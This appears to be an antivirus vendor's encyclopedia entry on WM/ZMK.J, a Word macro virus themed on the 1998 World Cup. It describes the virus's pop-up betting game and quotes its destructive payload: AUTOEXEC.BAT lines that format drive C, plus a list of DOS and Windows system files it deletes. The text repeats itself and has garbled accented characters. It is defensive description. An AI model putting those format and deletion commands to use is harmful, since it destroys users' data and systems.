F-Secure
Tools
ZMK
Summary
ZMK is a family of simple Word macro viruses.
Additional Details
This variant is trying to use the Soccer World Cup 98 as a gimmick to get publicity.
WM/ZMK.J activates on the 12th of July (the day of the championship match of World Cup 98).
When an infected user opens Word that day, a pop up screen will display a message in French:
Virus WorldCup98
VIVE LA COUPE DU MONDE 98!!!!
(In English: Viva the WorldCup 98!)
Then another dialog:
Hip Hip Hourra!!!!
J'espere que tu aime le football...
(I hope you like soccer...)
Then the virus asks the user to choose his favourite for the champioship, with the following choices:
- Brazil
- Spain
- England
- Italy
- Mexico
- Argentina
- France
- Yogoslavia
- German
After this, the virus selects a team by random. If the teams match, the virus displays:
- Bravo!!!
If the user lost in his bet:
Dommage pour toi, tu as PERDU...mon choix était:...
(Pity for you, you have lost....my choice was....)
The same activation routine is called by random if an infected document is opened exactly on the 12th second of a minute.
The virus also contains this text:
ZeMacroKiller98 est heureux ladédier ce virus
o tous ceux qui aime FOOTBALL
(ZeMacroKiller98 is happy to dedicate this virus
to everyone who likes soccer)
The virus also has two random activation routines. First one of these attempts to overwrite the C:\AUTOEXEC.BAT file with this:
- Cls
- Echo La coupe du monde 98 c'est génial!!!!
- Echo y|Format c: /u /v:WorldCup98
- Echo o|Format c: /u /v:WorldCup98
The second one tries to delete these files:
- C:\DOS\*.*
- C:\WINDOWS\COMMAND\*.*
- C:\MSDOS.SYS
| Variant: | ZMK.J |
This variant is trying to use the Soccer World Cup 98 as a gimmick to get publicity.
WM/ZMK.J activates on the 12th of July (the day of the championship match of World Cup 98). When an infected user opens Word that day, a pop up screen will display a message in French:
Virus WorldCup98 VIVE LA COUPE DU MONDE 98!!!! (In English: Viva the WorldCup 98!) Then another dialog: Hip Hip Hourra!!!! J'espere que tu aime le football... (I hope you like soccer...)
Then the virus asks the user to choose his favourite for the championship, with the following choices: Brazil Spain England Italy Mexico Argentina France Yogoslavia German
After this, the virus selects a team by random. If the teams match, the virus displays:
Bravo!!! If the user lost: Dommage pour toi, tu as PERDU...mon choix ?it:... (Pity for you, you have lost....my choice was....)
The same activation routine is called by random if an infected document is opened exactly on the 12th second of a minute.
The virus also contains this text: ZeMacroKiller98 est heureux lad?er ce virus o tous ceux qui aime FOOTBALL (ZeMacroKiller98 is happy to dedicate this virus to everyone who likes soccer) The virus also has two random activation routines. First one of these attempts to overwrite the C:\AUTOEXEC.BAT file with this: Cls Echo La coupe du monde 98 c'est g?al!!!! Echo y|Format c: /u /v:WorldCup98 Echo o|Format c: /u /v:WorldCup98 The second one tries to delete these files:
C:\DOS\*.*
C:\WINDOWS\COMMAND\*.*
C:\MSDOS.SYS
C:\IO.SYS
WM/ZMK.J activates on the 12th of July (the day of the championship match of World Cup 98). When an infected user opens Word that day, a pop up screen will display a message in French:
Virus WorldCup98 VIVE LA COUPE DU MONDE 98!!!! (In English: Viva the WorldCup 98!) Then another dialog: Hip Hip Hourra!!!! J'espere que tu aime le football... (I hope you like soccer...)
Then the virus asks the user to choose his favourite for the championship, with the following choices: Brazil Spain England Italy Mexico Argentina France Yogoslavia German
After this, the virus selects a team by random. If the teams match, the virus displays:
Bravo!!! If the user lost: Dommage pour toi, tu as PERDU...mon choix ?it:... (Pity for you, you have lost....my choice was....)
The same activation routine is called by random if an infected document is opened exactly on the 12th second of a minute.
The virus also contains this text: ZeMacroKiller98 est heureux lad?er ce virus o tous ceux qui aime FOOTBALL (ZeMacroKiller98 is happy to dedicate this virus to everyone who likes soccer) The virus also has two random activation routines. First one of these attempts to overwrite the C:\AUTOEXEC.BAT file with this: Cls Echo La coupe du monde 98 c'est g?al!!!! Echo y|Format c: /u /v:WorldCup98 Echo o|Format c: /u /v:WorldCup98 The second one tries to delete these files:
C:\DOS\*.*
C:\WINDOWS\COMMAND\*.*
C:\MSDOS.SYS
C:\IO.SYS